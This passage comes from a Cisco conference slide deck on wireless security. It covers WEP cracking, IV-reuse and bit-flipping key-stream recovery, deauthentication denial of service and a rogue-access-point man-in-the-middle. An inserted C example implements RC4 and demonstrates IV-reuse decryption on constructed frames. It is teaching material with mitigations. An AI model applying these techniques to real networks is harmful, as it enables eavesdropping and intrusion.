• The attack was made practical by Adam Stubblefield of Rice University and John Ioannidis and Avi Rubin of AT&T Labs
• Also implemented in AirSnort
    Available at http://airsnort.shmoo.com

(87) Fluhrer, Mantin, and Shamir
[Diagram: an attacker passively capturing frames between a wireless client and the Ethernet side. Frame fields: IV | Key | Encrypted Payload | ICV. IVs observed: 00:4A:90, 03:FF:FF, 04:AB:02, 10:FF:01, 03:FF:FF, 10:FF:01, …]

(88) AirSnort 0.2
[Screenshot]

(89) Inductive Key Derivation
• An attacker can derive the key by soliciting info from a wireless LAN
• Common methods
    IV/WEP Key Replay
    Frame Bit Flipping

(90) IV/WEP Key Reuse Vulnerability
• Attacker can send a known plaintext to an observable wireless client (i.e. via email)
• Attacker will ‘listen’ to the wireless LAN, waiting to see the predicted ciphertext
• Once the attacker ‘sees’ the ciphertext, the key stream is derived
• Key stream is valid only for the specific IV
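
Slides 78, 79 and 90 carried through in code, as an added example that is not from the deck: RC4 with the WEP IV-prefixed per-frame key, checked against the standard RC4 test vector, then the key-stream recovery that IV reuse permits. The secret key, frame contents and function names are the editor's constructions; the IV is the first one listed on slide 87 and the ICV is left out.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example, not from the Cisco deck: WEP-style RC4 framing, with the
 * 24-bit IV prepended to the secret key (slides 78-80), used to show why
 * IV reuse hands out the key stream (slide 90). The ICV is left out; the
 * secret key and frame contents are constructed, the IV is the first one
 * listed on slide 87. */

/* RC4: key scheduling, then n bytes of key stream. */
void rc4_keystream(const uint8_t *key, size_t keylen, uint8_t *out, size_t n)
{
    uint8_t S[256];
    for (int i = 0; i < 256; i++)
        S[i] = (uint8_t)i;
    for (int i = 0, j = 0; i < 256; i++) {              /* KSA */
        j = (j + S[i] + key[i % keylen]) & 0xFF;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
    }
    for (size_t k = 0, i = 0, j = 0; k < n; k++) {      /* PRGA */
        i = (i + 1) & 0xFF;
        j = (j + S[i]) & 0xFF;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
        out[k] = S[(S[i] + S[j]) & 0xFF];
    }
}

/* Standard RC4 test vector: key "Key", plaintext "Plaintext" encrypts to
 * BB F3 16 E8 D9 40 AF 0A D3. Returns 1 if the implementation matches. */
int rc4_vector_ok(void)
{
    static const uint8_t key[3] = { 'K', 'e', 'y' };
    static const uint8_t expect[9] = { 0xBB, 0xF3, 0x16, 0xE8, 0xD9, 0x40, 0xAF, 0x0A, 0xD3 };
    const char *pt = "Plaintext";
    uint8_t ks[9], ct[9];
    rc4_keystream(key, sizeof key, ks, sizeof ks);
    for (size_t k = 0; k < 9; k++)
        ct[k] = (uint8_t)pt[k] ^ ks[k];
    return memcmp(ct, expect, 9) == 0;
}

/* WEP per-frame key = IV || secret (5 or 13 bytes); out = in XOR key stream.
 * Returns 1, or 0 if the arguments are out of range. */
int wep_xor(const uint8_t iv[3], const uint8_t *secret, size_t secretlen,
            const uint8_t *in, uint8_t *out, size_t n)
{
    uint8_t perframe[3 + 13];
    uint8_t ks[256];
    if ((secretlen != 5 && secretlen != 13) || n > sizeof ks)
        return 0;
    memcpy(perframe, iv, 3);
    memcpy(perframe + 3, secret, secretlen);
    rc4_keystream(perframe, 3 + secretlen, ks, n);
    for (size_t k = 0; k < n; k++)
        out[k] = in[k] ^ ks[k];
    return 1;
}

/* Slide 90 in code. Two frames go out under the same IV. The observer
 * knows the first frame's plaintext (it caused that data to be sent) and
 * computes plaintext XOR ciphertext = key stream for that IV; XORing the
 * second frame's ciphertext with that key stream recovers it, without
 * any knowledge of the secret key. Returns 1 if the recovery is exact. */
int demo_iv_reuse(void)
{
    static const uint8_t secret[5] = { 0x0B, 0xAD, 0xC0, 0xDE, 0x42 };   /* constructed 40-bit key */
    static const uint8_t iv[3] = { 0x00, 0x4A, 0x90 };                   /* IV from slide 87 */
    static const uint8_t known_pt[] = "ping 192.0.2.7 seq=0001";        /* constructed known plaintext */
    static const uint8_t victim_pt[] = "Authorization: secret";         /* constructed second frame */
    uint8_t c1[64], c2[64], ks[64], out[64];
    size_t n = sizeof victim_pt;          /* the known plaintext is at least this long */

    if (!wep_xor(iv, secret, sizeof secret, known_pt, c1, sizeof known_pt))
        return 0;
    if (!wep_xor(iv, secret, sizeof secret, victim_pt, c2, n))
        return 0;
    for (size_t k = 0; k < n; k++)
        ks[k] = known_pt[k] ^ c1[k];      /* key stream, valid only for this IV */
    for (size_t k = 0; k < n; k++)
        out[k] = c2[k] ^ ks[k];           /* the second frame falls out */
    return memcmp(out, victim_pt, n) == 0;
}
```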

(91) IV/WEP Key Reuse Vulnerability
[Diagram: 1. Plaintext data is sent to the victim over the Internet; 2. the ciphertext reaches the victim through the corporate network and AP, and the attacker listening on the wireless side captures it]

(92) Bit Flipping Vulnerability
• Attacker captures a frame from a wireless LAN
• The frame is modified by flipping bits
• Attacker predicts a high-layer error
• Attacker waits for the predicted error ciphertext
• The key stream is derived upon ‘seeing’ the predicted ciphertext

(93) Bit Flipping Vulnerability
[Diagram: the attacker sends a bit-flipped frame; the WEP ICV passes at the access point; the layer 3 receiver fails its CRC and returns a plaintext error message, which the access point encrypts; Predicted Plaintext Error Msg XOR Ciphertext Error Msg = Key Stream]

(94) Weaknesses in Management Frames
• DoS: forge management frames
    Management frames are not encrypted or authenticated
    Send de-authenticate and disassociate frames
    AP re-association is not possible if disassociate messages are sent continuously

(95) Wireless Man in the Middle
• 802.11 layer insertion
• Attacker is inline for all key exchanges

(96) Wireless Man in the Middle
[Diagram: AP on channel 6; an authenticated client exchanges ciphertext with the corporate network]

(97) Wireless Man in the Middle
• Attacker sends disassociate messages to the user, spoofing the AP’s MAC address

(98) Wireless Man in the Middle
• User gets too many disassociate messages and looks for another AP
• Increments channel

(99) Wireless Man in the Middle
• Attacker mimics an AP for the user’s corporate network
• Attacker uses a higher AP channel (Ch=8 versus the real AP’s Ch=6)

(100) Wireless Man in the Middle
• User does not know this is not his AP and authenticates, providing useful info

(101) Wireless Man in the Middle
• Attacker authenticates to the corporate network
• Attacker tells the user they authenticated

(102) Wireless Man in the Middle
• Attacker forwards the user’s network traffic and has full access to the corporate network

(103) Wireless Man in the Middle
• Tools
    Air-jack
• Mitigation
    VPN with strong two-way authentication
    Lower signal strength so that it does not leak from the building

(104) Wireless Security
• What can be done? IEEE 802.11 Task Group i (TGi) is currently working on the next generation of wireless security
• What about today?
    IEEE 802.1x Port-Based Access Control
    Uses Extensible Authentication Protocol (EAP)
    Cisco’s implementation of 802.1x is known as LEAP
    IPSec over wireless

(105) What Did You Learn
• Network exploits are not “black magic”
    Vulnerabilities abound and buffer overflows aren’t that hard to exploit
    Worms are an effective mechanism to attack large numbers of hosts quickly
    Securing databases and applications is just as important as securing the base OS
    The original version of WEP is not all that it’s cracked up to be
• The key concept to take away from this is:
Defense Is Possible – Don’t Be a Statistic

(106) References
    Cisco Connection Online, http://www.cisco.com
    Cisco Secure Encyclopedia, http://www.cisco.com/go/csec
    Smashing The Stack for Fun and Profit, Aleph1, http://www.codetalker.com/whitepapers/other/p49-14.html
    Format String Attacks, http://julianor.tripod.com/tn-usfs.pdf
    A Report on the Internet Worm, http://www.digitaloffense.net/worms/morris_worm/worm.paper
    CodeRed Analysis, http://www.digitaloffense.net/worms/CodeRed/code-red-original-eeye/code-red-analysis.txt.gz
    General Security Related Topics, http://www.securityfocus.com
    PacketStorm, http://www.packetstormsecurity.com

(107) Contact Information
• [email protected]
• Cisco Secure Consulting Services, http://www.cisco.com/go/securityconsulting


(109) Do you dare to be challenged? Networkers Challenge is waiting for you. Check the event guide for details.

(110) Please Complete Your Evaluation Form, Session SEC-400
